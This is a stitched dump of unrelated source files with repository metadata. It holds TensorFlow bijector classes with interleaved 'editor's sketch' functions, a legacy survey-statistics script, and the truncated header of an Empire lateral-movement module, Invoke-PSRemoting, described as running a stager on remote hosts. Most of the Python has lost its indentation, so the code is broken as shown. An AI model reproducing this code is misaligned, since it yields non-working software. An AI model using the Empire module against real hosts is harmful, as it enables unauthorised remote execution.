if self.shift is not None:
x -= self.shift
if self._is_only_identity_multiplier:
return x / self._scale
x, sample_shape = self.shaper.make_batch_of_event_sample_matrices(x)
x = self._scale.sqrt_solve(x)
x = self.shaper.undo_make_batch_of_event_sample_matrices(x, sample_shape)
return x
def _inverse_log_det_jacobian(self, y):
return -self._forward_log_det_jacobian(y)
def _forward_log_det_jacobian(self, x):
if self._is_only_identity_multiplier:
# TODO(jvdillon): We don't pad in this case and instead let the fldj be
# applied via broadcast.
d = math_ops.cast(array_ops.shape(x)[-1], dtype=self._scale.dtype)
return math_ops.log(math_ops.abs(self._scale)) * array_ops.where(
math_ops.equal(self.shaper.event_ndims, 0), 1., d)
fldj = self._scale.sqrt_log_abs_det()
# We need to squeeze off the padded dimension.
start = array_ops.where(self._rank_two_event_ndims_one, 1, 0)
return array_ops.reshape(fldj, array_ops.shape(fldj)[start:])
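def _affine_usage_sketch():
  """Editor's illustrative sketch -- not part of the original source.

  A minimal use of `Affine` with a diagonal scale. Assumes a TF1-style
  graph/session API; the expected values follow from `scale @ x + shift`.
  """
  import tensorflow as tf
  b = Affine(shift=[1., 2., 3.], scale_diag=[1., 2., 3.])
  x = [1., 1., 1.]
  y = b.forward(x)       # diag([1, 2, 3]) @ x + shift = [2., 4., 6.]
  x_back = b.inverse(y)  # recovers x up to float error.
  with tf.Session() as sess:
    print(sess.run([y, x_back]))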
class AffineLinearOperator(Bijector):
"""Bijector which computes `Y = g(X; shift, scale) = scale @ X.T + shift`.
`shift` is a numeric `Tensor` and `scale` is a `LinearOperator`.
If `X` is a scalar then the forward transformation is: `scale * X + shift`
where `*` denotes the scalar product.
Note: we don't always simply transpose `X` (but write it this way for
brevity). Actually the input `X` undergoes the following transformation
before being premultiplied by `scale`:
1. If there are no sample dims, we call `X = tf.expand_dims(X, 0)`, i.e.,
`new_sample_shape = [1]`. Otherwise do nothing.
2. The sample shape is flattened to have one dimension, i.e.,
`new_sample_shape = [n]` where `n = tf.reduce_prod(old_sample_shape)`.
3. The sample dim is cyclically rotated left by 1, i.e.,
`new_shape = [B1,...,Bb, k, n]` where `n` is as above, `k` is the
event_shape, and `B1,...,Bb` are the batch shapes for each of `b` batch
dimensions.
(For more details see `shape.make_batch_of_event_sample_matrices`.)
The result of the above transformation is that `X` can be regarded as a batch
of matrices where each column is a draw from the distribution. After
premultiplying by `scale`, we take the inverse of this procedure. The input
`Y` also undergoes the same transformation before/after premultiplying by
`inv(scale)`.
Example Use:
```python
linalg = tf.contrib.linalg
x = [1., 2, 3]
shift = [-1., 0., 1]
diag = [1., 2, 3]
scale = linalg.LinearOperatorDiag(diag)
affine = AffineLinearOperator(shift, scale)
# In this case, `forward` is equivalent to:
  # diag * x + shift
y = affine.forward(x) # [0., 4, 10]
shift = [2., 3, 1]
tril = [[1., 0, 0],
[2, 1, 0],
[3, 2, 1]]
scale = linalg.LinearOperatorTriL(tril)
affine = AffineLinearOperator(shift, scale)
# In this case, `forward` is equivalent to:
# np.squeeze(np.matmul(tril, np.expand_dims(x, -1)), -1) + shift
y = affine.forward(x) # [3., 7, 11]
```
"""
def __init__(self,
shift=None,
scale=None,
event_ndims=1,
validate_args=False,
name="affine_linear_operator"):
"""Instantiates the `AffineLinearOperator` bijector.
Args:
shift: Numeric `Tensor`.
scale: Subclass of `LinearOperator`. Represents the (batch) positive
definite matrix `M` in `R^{k x k}`.
event_ndims: Scalar `integer` `Tensor` indicating the number of dimensions
associated with a particular draw from the distribution. Must be 0 or 1.
validate_args: `Boolean` indicating whether arguments should be checked
for correctness.
name: `String` name given to ops managed by this object.
Raises:
ValueError: if `event_ndims` is not 0 or 1.
TypeError: if `scale` is not a `LinearOperator`.
TypeError: if `shift.dtype` does not match `scale.dtype`.
ValueError: if not `scale.is_non_singular`.
"""
self._graph_parents = []
self._name = name
self._validate_args = validate_args
graph_parents = []
with self._name_scope("init", values=[shift]):
event_ndims = ops.convert_to_tensor(event_ndims, name="event_ndims")
if tensor_util.constant_value(event_ndims) is not None:
event_ndims = tensor_util.constant_value(event_ndims)
if event_ndims not in (0, 1):
raise ValueError("event_ndims({}) was not 0 or 1".format(event_ndims))
else:
if validate_args:
# Shape tool will catch if event_ndims is negative.
event_ndims = control_flow_ops.with_dependencies(
[check_ops.assert_less(
event_ndims, 2, message="event_ndims must be 0 or 1")],
event_ndims)
graph_parents += [event_ndims]
if shift is not None:
shift = ops.convert_to_tensor(shift, name="shift")
graph_parents += [shift]
self._shift = shift
if scale is not None:
if (shift is not None and
shift.dtype.base_dtype != scale.dtype.base_dtype):
raise TypeError(
"shift.dtype({}) is incompatible with scale.dtype({}).".format(
shift.dtype, scale.dtype))
if not isinstance(scale, linear_operator.LinearOperator):
raise TypeError("scale is not an instance of tf.LinearOperator")
if validate_args and not scale.is_non_singular:
raise ValueError("Scale matrix must be non-singular.")
graph_parents += scale.graph_parents
if scale.tensor_rank is not None:
batch_ndims = scale.tensor_rank - 2
else:
batch_ndims = scale.tensor_rank_dynamic() - 2
graph_parents += [batch_ndims]
else:
batch_ndims = 0 # We won't need shape inference when scale is None.
self._scale = scale
super(AffineLinearOperator, self).__init__(
batch_ndims=batch_ndims,
event_ndims=event_ndims,
graph_parents=graph_parents,
is_constant_jacobian=True,
validate_args=validate_args,
name=name)
@property
def shift(self):
"""The `shift` `Tensor` in `Y = scale @ X.T + shift`."""
return self._shift
@property
def scale(self):
"""The `scale` `LinearOperator` in `Y = scale @ X.T + shift`."""
return self._scale
def _forward(self, x):
y = x
if self.scale is not None:
y, sample_shape = self.shaper.make_batch_of_event_sample_matrices(
y, expand_batch_dim=False)
with ops.control_dependencies([self.scale.assert_non_singular()] if
self.validate_args else []):
y = self.scale.apply(y)
y = self.shaper.undo_make_batch_of_event_sample_matrices(
y, sample_shape, expand_batch_dim=False)
if self.shift is not None:
y += self.shift
return y
def _inverse(self, y):
x = y
if self.shift is not None:
x -= self.shift
if self.scale is not None:
x, sample_shape = self.shaper.make_batch_of_event_sample_matrices(
x, expand_batch_dim=False)
# Solve fails if the op is singular so we may safely skip this assertion.
x = self.scale.solve(x)
x = self.shaper.undo_make_batch_of_event_sample_matrices(
x, sample_shape, expand_batch_dim=False)
return x
def _inverse_log_det_jacobian(self, y):
return -self._forward_log_det_jacobian(y)
def _forward_log_det_jacobian(self, x): # pylint: disable=unused-argument
if self.scale is None:
return constant_op.constant(0, dtype=x.dtype.base_dtype)
with ops.control_dependencies([self.scale.assert_non_singular()] if
self.validate_args else []):
return self.scale.log_abs_determinant()
class Softplus(Bijector):
"""Bijector which computes `Y = g(X) = Log[1 + exp(X)]`.
The softplus `Bijector` has the following two useful properties:
* The domain is the positive real numbers
* `softplus(x) approx x`, for large `x`, so it does not overflow as easily as
the `Exp` `Bijector`.
Example Use:
```python
# Create the Y=g(X)=softplus(X) transform which works only on Tensors with 1
# batch ndim and 2 event ndims (i.e., vector of matrices).
softplus = Softplus(batch_ndims=1, event_ndims=2)
x = [[[1., 2],
[3, 4]],
[[5, 6],
[7, 8]]]
log(1 + exp(x)) == softplus.forward(x)
log(exp(x) - 1) == softplus.inverse(x)
```
Note: log(.) and exp(.) are applied element-wise but the Jacobian is a
reduction over the event space.
"""
def __init__(self,
event_ndims=0,
validate_args=False,
name="softplus"):
super(Softplus, self).__init__(
batch_ndims=0,
event_ndims=event_ndims,
validate_args=validate_args,
name=name)
def _forward(self, x):
return nn_ops.softplus(x)
def _inverse_and_inverse_log_det_jacobian(self, y):
# The most stable inverse of softplus is not the most obvious one.
# y = softplus(x) = Log[1 + exp{x}], (which means y > 0).
# ==> exp{y} = 1 + exp{x} (1)
# ==> x = Log[exp{y} - 1] (2)
# = Log[(exp{y} - 1) / exp{y}] + Log[exp{y}]
# = Log[(1 - exp{-y}) / 1] + Log[exp{y}]
# = Log[1 - exp{-y}] + y (3)
# (2) is the "obvious" inverse, but (3) is more stable than (2) for large y.
# For small y (e.g. y = 1e-10), (3) will become -inf since 1 - exp{-y} will
# be zero. To fix this, we use 1 - exp{-y} approx y for small y > 0.
#
# Stable inverse log det jacobian.
# Y = Log[1 + exp{X}] ==> X = Log[exp{Y} - 1]
# ==> dX/dY = exp{Y} / (exp{Y} - 1)
# = 1 / (1 - exp{-Y}),
# which is the most stable for large Y > 0. For small Y, we use
# 1 - exp{-Y} approx Y.
if self.shaper is None:
raise ValueError("Jacobian cannot be computed with unknown event_ndims")
_, _, event_dims = self.shaper.get_dims(y)
log_one_minus_exp_neg = math_ops.log(-_expm1(-y))
x = y + log_one_minus_exp_neg
ildj = -math_ops.reduce_sum(
log_one_minus_exp_neg, reduction_indices=event_dims)
return x, ildj
def _forward_log_det_jacobian(self, x): # pylint: disable=unused-argument
if self.shaper is None:
raise ValueError("Jacobian cannot be computed with unknown event_ndims")
_, _, event_dims = self.shaper.get_dims(x)
return -math_ops.reduce_sum(
nn_ops.softplus(-x), reduction_indices=event_dims)
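def _softplus_inverse_numpy_sketch():
  """Editor's illustrative sketch -- not part of the original source.

  Shows in NumPy why form (3) above is the preferred inverse of softplus:
  `x = y + log(1 - exp(-y))`, computed with `expm1` exactly as in
  `_inverse_and_inverse_log_det_jacobian`.
  """
  import numpy as np
  y = np.array([1e-10, 1., 30., 800.])
  with np.errstate(over="ignore"):
    naive = np.log(np.exp(y) - 1.)      # form (2): overflows at y = 800.
  stable = y + np.log(-np.expm1(-y))    # form (3): finite everywhere here.
  assert np.isinf(naive[-1]) and np.all(np.isfinite(stable))
  # Round trip: softplus(stable) recovers y.
  assert np.allclose(np.logaddexp(0., stable), y)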
class SoftmaxCentered(Bijector):
"""Bijector which computes `Y = g(X) = exp([X 0]) / sum(exp([X 0]))`.
To implement [softmax](https://en.wikipedia.org/wiki/Softmax_function) as a
bijection, the forward transformation appends a value to the input and the
inverse removes this coordinate. The appended coordinate represents a pivot,
e.g., `softmax(x) = exp(x-c) / sum(exp(x-c))` where `c` is the implicit last
coordinate.
  Because we append a coordinate, this bijector only supports `event_ndims in
  [0, 1]`, i.e., scalars and vectors.
Example Use:
```python
bijector.SoftmaxCentered(event_ndims=1).forward(tf.log([2, 3, 4]))
# Result: [0.2, 0.3, 0.4, 0.1]
# Extra result: 0.1
bijector.SoftmaxCentered(event_ndims=1).inverse([0.2, 0.3, 0.4, 0.1])
# Result: tf.log([2, 3, 4])
# Extra coordinate removed.
```
At first blush it may seem like the [Invariance of domain](
https://en.wikipedia.org/wiki/Invariance_of_domain) theorem implies this
implementation is not a bijection. However, the appended dimension
makes the (forward) image non-open and the theorem does not directly apply.
"""
def __init__(self,
event_ndims=0,
validate_args=False,
name="softmax_centered"):
self._graph_parents = []
self._name = name
with self._name_scope("init", values=[event_ndims]):
event_ndims = ops.convert_to_tensor(event_ndims, name="event_ndims")
event_ndims = tensor_util.constant_value(event_ndims)
if event_ndims is None or event_ndims not in [0, 1]:
raise ValueError("`event_ndims` must be a TF constant which is 0 or 1")
self._static_event_ndims = event_ndims
super(SoftmaxCentered, self).__init__(
batch_ndims=0, # We'll regard all non-event dims as sample dims.
event_ndims=event_ndims,
validate_args=validate_args,
name=name)
def _get_forward_event_shape(self, input_shape):
if input_shape.ndims is None:
return input_shape
if input_shape.ndims != self._static_event_ndims:
raise ValueError("input_shape.dims = %d != %d" %
(input_shape.ndims, self._static_event_ndims))
if input_shape.ndims == 0:
return tensor_shape.TensorShape([2])
if input_shape.ndims == 1:
return tensor_shape.TensorShape(input_shape[0] + 1)
# Unreachable code:
raise ValueError("event_ndims = %d must be 0 or 1" % input_shape.ndims)
def _forward_event_shape(self, input_shape):
ndims = array_ops.shape(input_shape)
if self.validate_args:
      # A shape cannot be negative, so we need only check the upper bound.
is_zero_or_one = check_ops.assert_equal(
ndims, 0 if self._static_event_ndims == 0 else 1,
message="event_ndims must be 0 or 1")
ndims = control_flow_ops.with_dependencies([is_zero_or_one], ndims)
if self._static_event_ndims == 0:
return ops.convert_to_tensor(
[2], dtype=dtypes.int32, name="output_shape")
return input_shape + 1
def _get_inverse_event_shape(self, output_shape):
if output_shape.ndims is None:
return output_shape
if output_shape.ndims != 1:
raise ValueError("output_shape.ndims = %d != 1" % output_shape.ndims)
if self._static_event_ndims == 0:
return tensor_shape.TensorShape([])
return tensor_shape.TensorShape(output_shape[0] - 1)
def _inverse_event_shape(self, output_shape):
ndims = array_ops.shape(output_shape)[0]
if self.validate_args:
      # A shape cannot be negative, so we need only check the upper bound.
is_one = check_ops.assert_equal(
ndims, 1, message="event_ndims must be 1")
ndims = control_flow_ops.with_dependencies([is_one], ndims)
if self._static_event_ndims == 0:
return ops.convert_to_tensor([], dtype=dtypes.int32, name="output_shape")
return array_ops.expand_dims(output_shape[0] - 1, dim=0)
def _forward(self, x):
# Pad the last dim with a zeros vector. We need this because it lets us
# infer the scale in the inverse function.
y = array_ops.expand_dims(x, dim=-1) if self._static_event_ndims == 0 else x
ndims = (y.get_shape().ndims if y.get_shape().ndims is not None
else array_ops.rank(y))
y = array_ops.pad(y,
paddings=array_ops.concat_v2(
(array_ops.zeros(
(ndims - 1, 2), dtype=dtypes.int32), [[0, 1]]),
0))
# Set shape hints.
if x.get_shape().ndims is not None:
shape = x.get_shape().as_list()
if self._static_event_ndims == 0:
shape += [2]
elif shape[-1] is not None:
shape[-1] += 1
shape = tensor_shape.TensorShape(shape)
y.get_shape().assert_is_compatible_with(shape)
y.set_shape(shape)
# Since we only support event_ndims in [0, 1] and we do padding, we always
# reduce over the last dimension, i.e., dim=-1 (which is the default).
return nn_ops.softmax(y)
def _inverse(self, y):
# To derive the inverse mapping note that:
# y[i] = exp(x[i]) / normalization
# and
# y[end] = 1 / normalization.
# Thus:
# x[i] = log(exp(x[i])) - log(y[end]) - log(normalization)
# = log(exp(x[i])/normalization) - log(y[end])
# = log(y[i]) - log(y[end])
shape = (np.asarray(y.get_shape().as_list(), dtype=np.int32)
if y.get_shape().is_fully_defined()
else array_ops.shape(y, name="shape"))
ndims = y.get_shape().ndims or math_ops.rank(y, name="ndims")
# Do this first to make sure CSE catches that it'll happen again in
# _inverse_log_det_jacobian.
x = math_ops.log(y)
# We now extract the last coordinate of the rightmost dimension.
# Our trick is to slice from [0,0,...,shape[-1]-1] to shape[:-1]+[1].
begin = array_ops.one_hot(indices=ndims-1,
depth=ndims,
on_value=shape[-1]-np.array(1, dtype=shape.dtype),
dtype=shape.dtype)
size = array_ops.concat_v2(
(shape[:-1], np.asarray(
[1], dtype=shape.dtype)), 0)
log_normalization = -array_ops.strided_slice(x, begin, begin + size)
# Here we slice out all but the last coordinate; see above for idea.
begin = array_ops.zeros_like(shape)
size = array_ops.concat_v2((shape[:-1], [shape[-1] - 1]), 0)
x = array_ops.strided_slice(x, begin, begin + size)
x += log_normalization
if self._static_event_ndims == 0:
x = array_ops.squeeze(x, squeeze_dims=[ndims-1])
# Set shape hints.
if y.get_shape().ndims is not None:
shape = y.get_shape().as_list()
if self._static_event_ndims == 0:
shape = shape[:-1]
elif shape[-1] is not None:
shape[-1] -= 1
shape = tensor_shape.TensorShape(shape)
x.get_shape().assert_is_compatible_with(shape)
x.set_shape(shape)
return x
def _inverse_log_det_jacobian(self, y):
# WLOG, consider the vector case:
# x = log(y[:-1]) - log(y[-1])
# where,
# y[-1] = 1 - sum(y[:-1]).
# We have:
# det{ dX/dY } = det{ diag(1 ./ y[:-1]) + 1 / y[-1] }
# = det{ inv{ diag(y[:-1]) - y[:-1]' y[:-1] } } (1)
# = 1 / det{ diag(y[:-1]) - y[:-1]' y[:-1] }
    #               = 1 / { (1 - y[:-1]' inv(diag(y[:-1])) y[:-1]) *
# det(diag(y[:-1])) } (2)
# = 1 / { y[-1] prod(y[:-1]) }
# = 1 / prod(y)
# (1) - https://en.wikipedia.org/wiki/Sherman%E2%80%93Morrison_formula
# or by noting that det{ dX/dY } = 1 / det{ dY/dX } from Bijector
# docstring "Tip".
# (2) - https://en.wikipedia.org/wiki/Matrix_determinant_lemma
return -math_ops.reduce_sum(math_ops.log(y), reduction_indices=-1)
def _forward_log_det_jacobian(self, x):
if self._static_event_ndims == 0:
return x - 2. * nn_ops.softplus(x)
else:
      # This code is similar to nn_ops.log_softmax but different because we have
      # an implicit zero column to handle. I.e., instead of:
      #   reduce_sum(logits - log(reduce_sum(exp(logits), dim)))
      # we must do:
      #   log_normalization = log(1 + reduce_sum(exp(logits)))
      #   -log_normalization + reduce_sum(logits - log_normalization)
log_normalization = nn_ops.softplus(
math_ops.reduce_logsumexp(x, reduction_indices=-1, keep_dims=True))
fldj = (-log_normalization +
math_ops.reduce_sum(x - log_normalization,
reduction_indices=-1,
keep_dims=True))
return array_ops.squeeze(fldj, squeeze_dims=-1)
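def _softmax_centered_numpy_sketch():
  """Editor's illustrative sketch -- not part of the original source.

  Replays the vector-case math above in NumPy: the forward map appends an
  implicit zero logit, the inverse is `log(y[:-1]) - log(y[-1])`, and the
  inverse log-det-Jacobian is `-sum(log(y))`, checked here against a
  brute-force numeric Jacobian.
  """
  import numpy as np
  x = np.log([2., 3., 4.])
  z = np.append(x, 0.)                      # implicit pivot coordinate.
  y = np.exp(z) / np.exp(z).sum()           # forward: [0.2, 0.3, 0.4, 0.1].
  assert np.allclose(y, [.2, .3, .4, .1])
  x_back = np.log(y[:-1]) - np.log(y[-1])   # inverse drops the pivot.
  assert np.allclose(x_back, x)
  ildj = -np.sum(np.log(y))                 # _inverse_log_det_jacobian above.
  eps = 1e-6
  jac = np.empty((3, 3))
  for j in range(3):
    y_eps = y[:-1].copy()
    y_eps[j] += eps
    y_full = np.append(y_eps, 1. - y_eps.sum())
    jac[:, j] = (np.log(y_full[:-1]) - np.log(y_full[-1]) - x_back) / eps
  assert np.allclose(ildj, np.log(abs(np.linalg.det(jac))), atol=1e-3)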
class SigmoidCentered(SoftmaxCentered):
"""Bijector which computes Y = g(X) = exp([X 0]) / (1 + exp(-X)).
Equivalent to: `bijector.SoftmaxCentered(event_ndims=0)`.
See `bijector.SoftmaxCentered` for more details.
"""
def __init__(self, validate_args=False, name="sigmoid_centered"):
super(SigmoidCentered, self).__init__(
validate_args=validate_args, name=name)
class CholeskyOuterProduct(Bijector):
# pylint: disable=line-too-long
"""Bijector which computes Y = g(X) = X X.T where X is a lower-triangular, positive-diagonal matrix.
`event_ndims` must be 0 or 2, i.e., scalar or matrix.
  Note: the upper-triangular part of X is ignored (whether or not it is zero).
Examples:
```python
bijector.CholeskyOuterProduct(event_ndims=2).forward(x=[[1., 0], [2, 1]])
  # Result: [[1, 2], [2, 5]], i.e., x x.T
  bijector.CholeskyOuterProduct(event_ndims=2).inverse(y=[[1., 2], [2, 5]])
# Result: [[1, 0], [2, 1]], i.e., chol(y).
```
"""
# pylint: enable=line-too-long
def __init__(self, event_ndims=2, validate_args=False,
name="cholesky_outer_product"):
"""Instantiates the `CholeskyOuterProduct` bijector.
Args:
event_ndims: `constant` `int32` scalar `Tensor` indicating the number of
dimensions associated with a particular draw from the distribution. Must
be 0 or 2.
validate_args: `Boolean` indicating whether arguments should be checked
for correctness.
name: `String` name given to ops managed by this object.
Raises:
      ValueError: if event_ndims is neither 0 nor 2.
"""
self._graph_parents = []
self._name = name
with self._name_scope("init", values=[event_ndims]):
event_ndims = ops.convert_to_tensor(event_ndims, name="event_ndims")
event_ndims = tensor_util.constant_value(event_ndims)
if event_ndims is None or event_ndims not in [0, 2]:
raise ValueError("`event_ndims` must be a TF constant which is 0 or 2")
self._static_event_ndims = event_ndims
super(CholeskyOuterProduct, self).__init__(
validate_args=validate_args,
name=name)
def _forward(self, x):
if self._static_event_ndims == 0:
return math_ops.square(x)
if self.validate_args:
is_matrix = check_ops.assert_rank_at_least(x, 2)
shape = array_ops.shape(x)
is_square = check_ops.assert_equal(shape[-2], shape[-1])
x = control_flow_ops.with_dependencies([is_matrix, is_square], x)
# For safety, explicitly zero-out the upper triangular part.
x = array_ops.matrix_band_part(x, -1, 0)
return math_ops.matmul(x, x, adjoint_b=True)
def _inverse_and_inverse_log_det_jacobian(self, y):
x = (math_ops.sqrt(y) if self._static_event_ndims == 0
else linalg_ops.cholesky(y))
return x, -self._forward_log_det_jacobian(x)
def _forward_log_det_jacobian(self, x):
# Let Y be a symmetric, positive definite matrix and write:
# Y = X X.T
# where X is lower-triangular.
#
# Observe that,
# dY[i,j]/dX[a,b]
# = d/dX[a,b] { X[i,:] X[j,:] }
# = sum_{d=1}^p { I[i=a] I[d=b] X[j,d] + I[j=a] I[d=b] X[i,d] }
#
# To compute the Jacobian dX/dY we must represent X,Y as vectors. Since Y is
# symmetric and X is lower-triangular, we need vectors of dimension:
# d = p (p + 1) / 2
# where X, Y are p x p matrices, p > 0. We use a row-major mapping, i.e.,
# k = { i (i + 1) / 2 + j i>=j
# { undef i<j
# and assume zero-based indexes. When k is undef, the element is dropped.
# Example:
# j k
# 0 1 2 3 /
# 0 [ 0 . . . ]
# i 1 [ 1 2 . . ]
# 2 [ 3 4 5 . ]
# 3 [ 6 7 8 9 ]
# Write vec[.] to indicate transforming a matrix to vector via k(i,j). (With
# slight abuse: k(i,j)=undef means the element is dropped.)
#
# We now show d vec[Y] / d vec[X] is lower triangular. Assuming both are
# defined, observe that k(i,j) < k(a,b) iff (1) i<a or (2) i=a and j<b.
# In both cases dvec[Y]/dvec[X]@[k(i,j),k(a,b)] = 0 since:
# (1) j<=i<a thus i,j!=a.
# (2) i=a>j thus i,j!=a.
#
# Since the Jacobian is lower-triangular, we need only compute the product
# of diagonal elements:
    #   d vec[Y] / d vec[X] @[k(i,j), k(i,j)]
    #   = X[j,j] + I[i=j] X[i,j]
    #   = 2 X[j,j] when i = j, and X[j,j] otherwise.
    # Column j thus contributes one factor 2 X[j,j] (its diagonal element) and
    # p-1-j factors X[j,j] (its strictly-lower elements), so we conclude:
    #   |Jac(d vec[Y]/d vec[X])| = 2^p prod_{j=0}^{p-1} X[j,j]^{p-j}.
if self._static_event_ndims == 0:
if self.validate_args:
is_positive = check_ops.assert_positive(
x, message="All elements must be positive.")
x = control_flow_ops.with_dependencies([is_positive], x)
return math.log(2.) + math_ops.log(x)
diag = array_ops.matrix_diag_part(x)
if self.validate_args:
is_matrix = check_ops.assert_rank_at_least(
x, 2, message="Input must be a (batch of) matrix.")
shape = array_ops.shape(x)
is_square = check_ops.assert_equal(
shape[-2], shape[-1],
message="Input must be a (batch of) square matrix.")
# Assuming lower-triangular means we only need check diag>0.
is_positive_definite = check_ops.assert_positive(
diag, message="Input must be positive definite.")
x = control_flow_ops.with_dependencies(
[is_matrix, is_square, is_positive_definite], x)
# Create a column vector equal to: [p, p-1, ..., 2, 1].T.
if x.get_shape().ndims is None or x.get_shape()[-1].value is None:
p = array_ops.shape(x)[-1]
else:
p = x.get_shape()[-1].value
exponents = array_ops.expand_dims(
math_ops.linspace(math_ops.cast(p, dtype=x.dtype), 1., p),
dim=1)
sum_weighted_log_diag = array_ops.squeeze(
math_ops.matmul(math_ops.log(diag), exponents), squeeze_dims=-1)
fldj = p * math.log(2.) + sum_weighted_log_diag
if x.get_shape().ndims is not None:
fldj.set_shape(x.get_shape()[:-2])
return fldj
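def _cholesky_outer_product_fldj_sketch():
  """Editor's illustrative sketch -- not part of the original source.

  Checks the closed form above, |Jac| = 2^p prod_j X[j,j]^(p-j), against a
  brute-force Jacobian of vec[Y] w.r.t. vec[X] built in NumPy.
  """
  import itertools
  import numpy as np
  rng = np.random.RandomState(1)
  p = 3
  x = np.tril(rng.rand(p, p)) + np.eye(p)  # lower-tri, positive diagonal.
  tril_idx = [(i, j) for i, j in itertools.product(range(p), range(p))
              if i >= j]

  def vec_y(x_vals):
    xm = np.zeros((p, p))
    for val, (i, j) in zip(x_vals, tril_idx):
      xm[i, j] = val
    y = xm.dot(xm.T)
    return np.array([y[i, j] for (i, j) in tril_idx])

  x_vals = np.array([x[i, j] for (i, j) in tril_idx])
  eps = 1e-6
  jac = np.empty((len(tril_idx), len(tril_idx)))
  for col in range(len(tril_idx)):
    dx = x_vals.copy()
    dx[col] += eps
    jac[:, col] = (vec_y(dx) - vec_y(x_vals)) / eps
  brute = np.log(abs(np.linalg.det(jac)))
  closed = p * np.log(2.) + sum((p - j) * np.log(x[j, j]) for j in range(p))
  assert np.allclose(brute, closed, atol=1e-3)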
| [
"[email protected]"
] | |
3b804e792b3544778740271e6b7778c33013a07a | 8b0fc85f784618b81a63a038d65cad2354e674ac | /cmo_hr_expense_report/models/__init__.py | 4a84a60ed89128ff60182e89b87d001de8b6a8ec | [] | no_license | ecosoft-odoo/cmo_specific | 2e284fc0be2cf2de7986cbfe9fe233ef2c964d41 | 12cc42d9555b3b587f148cb36bac8e7e3f7c1593 | refs/heads/master | 2021-09-18T03:33:35.342095 | 2021-04-12T04:25:28 | 2021-04-12T04:25:28 | 113,545,569 | 3 | 12 | null | 2022-01-20T11:47:52 | 2017-12-08T07:31:34 | Python | UTF-8 | Python | false | false | 42 | py | # -*- coding: utf-8 -*-
from . import hr
| [
"[email protected]"
] | |
219cef7e0bdb3c19ef844fd2b9f31656dcc58f07 | 2817ecd7e48c4decba12ee76e451727c1a6acf14 | /scripts/legacy/survey_distribution.py | 645981e58fef1bc3a1c76cafe786360c095677dc | [] | no_license | schwa-lab/sharingnews | 6fcef71c16a03fb3a4a56c11322ba5c8ceb59582 | 81c87176c7b37511f15a97189f03d90d5074d0fb | refs/heads/master | 2021-01-16T21:46:23.108811 | 2018-02-12T06:33:30 | 2018-02-12T06:33:30 | 26,195,626 | 3 | 0 | null | 2018-02-12T06:33:16 | 2014-11-05T00:39:40 | Python | UTF-8 | Python | false | false | 3,985 | py | from __future__ import print_function, division
from collections import Counter, defaultdict
import operator
from likeable.cleaning import strip_subdomains
MONTH_FIELD = 1
def get_status_binary(l):
status = l[8]
if status == '200':
return True
else:
return False
def get_status_group(l):
status = l[8]
if status.startswith('<') or status == '-':
return 'ERR'
elif status == '200?':
return 'HOME'
else:
return status[0] + 'xx'
def _norm_date(dt, n_months):
if n_months is None:
return
return (dt[:4] + '-' +
'%02d' % ((int(dt[5:7]) - 1) // n_months * n_months + 1))
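# Editor's note -- a quick doctest-style illustration of the bucketing above
# (derived from the arithmetic; not part of the original script):
#
#   >>> _norm_date('2014-05-20', 6)
#   '2014-01'
#   >>> _norm_date('2014-07-15', 3)
#   '2014-07'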
def get_distribs(key_field, get_cat, n_months, weight=None):
# Group survey by status (cat), sig (key) and date group
distrs = defaultdict(Counter)
for l in open('data/sample-survey-v2'):
l = l.rstrip('\r\n').split('\t')
dt = _norm_date(l[MONTH_FIELD], n_months)
distrs[l[key_field], dt][get_cat(l)] += 1
if weight is None:
get_weight = lambda k: 1
else:
get_weight = weight.get
for k in distrs:
distr = distrs[k]
w = get_weight(k) or 0 # HACK due to dirty data?
total = sum(distr.values())
distrs[k] = {c: w * n / total
for c, n in distr.items()}
return distrs
def get_sig_weights(n_months):
# Get overall frequency for each key and date
sig_weight = defaultdict(int)
for l in open('data/url-sig-frequencies.txt'):
l = l.rstrip('\r\n').split('\t')
try:
sig_weight[l[2], _norm_date(l[1], n_months)] += int(l[0])
except (IndexError, ValueError):
# Dirty data
pass
sig_weight.default_factory = None
return sig_weight
def _sig_to_domain(sig):
return strip_subdomains(sig.split('/')[0])
def regroup_by_domain(distrs):
out = defaultdict(lambda: defaultdict(float))
for (k, m), distr in distrs.iteritems():
for c, n in distr.iteritems():
out[_sig_to_domain(k), m][c] += n
return out
def get_all_cats(distrs):
cats = set()
for distr in distrs.itervalues():
for c in distr:
cats.add(c)
return sorted(cats)
if __name__ == '__main__':
import argparse
ap = argparse.ArgumentParser()
ap.add_argument('-m', '--month-quant', type=int,
help='Group this many months together (default, all time)')
ap.add_argument('--by-sig', default=False, action='store_true')
ap.add_argument('--use-end-sig', default=False, action='store_true',
help='Calculates status on the basis of likely canonical '
'URL signature')
cat_opts = {
'status-binary': get_status_binary,
'status-group': get_status_group,
}
ap.add_argument('-c', '--cats', choices=cat_opts.keys(),
default='status-binary')
args = ap.parse_args()
n_months = getattr(args, 'month_quant', None)
if n_months is not None and 12 % n_months != 0:
ap.error('--month-quant (-m) must divide into 12')
sig_weight = get_sig_weights(n_months)
key_field = 4 # start sig
if args.use_end_sig:
tmp = get_distribs(key_field, operator.itemgetter(7), n_months,
weight=sig_weight)
sig_weight = defaultdict(float)
for (start_sig, mo), distr in tmp.iteritems():
for end_sig, n in distr.iteritems():
sig_weight[end_sig, mo] += n
key_field = 7 # end sig
distrs = get_distribs(key_field, cat_opts[args.cats], n_months,
weight=sig_weight)
if not args.by_sig:
distrs = regroup_by_domain(distrs)
# output
all_cats = get_all_cats(distrs)
print('key', 'month', *all_cats, sep='\t')
for k, v in sorted(distrs.iteritems()):
k = list(k)
k.extend(v.get(c, 0) for c in all_cats)
print(*k, sep='\t')
| [
"[email protected]"
] | |
495ba133d20be9696a894db3f3accc2f2fd82015 | 326c6ad82d59bb7509c02c76695ea9035993da70 | /lib/modules/powershell/lateral_movement/invoke_psremoting.py | 4680387727765b745328f6c6d9f005817ee6c58e | [
"BSD-3-Clause"
] | permissive | Arvanaghi/Empire | 0c08bd7ddfba9be10e96bb0834b8ce3bc829059b | fd168ebf8acb1c2ee59d56f2c393ebd7a297603e | refs/heads/master | 2021-01-20T14:15:34.864581 | 2017-08-05T17:51:44 | 2017-08-05T17:51:44 | 99,435,848 | 2 | 0 | null | 2017-08-05T16:50:16 | 2017-08-05T16:50:16 | null | UTF-8 | Python | false | false | 5,441 | py | from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-PSRemoting',
'Author': ['@harmj0y'],
'Description': ('Executes a stager on remote hosts using PSRemoting.'),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
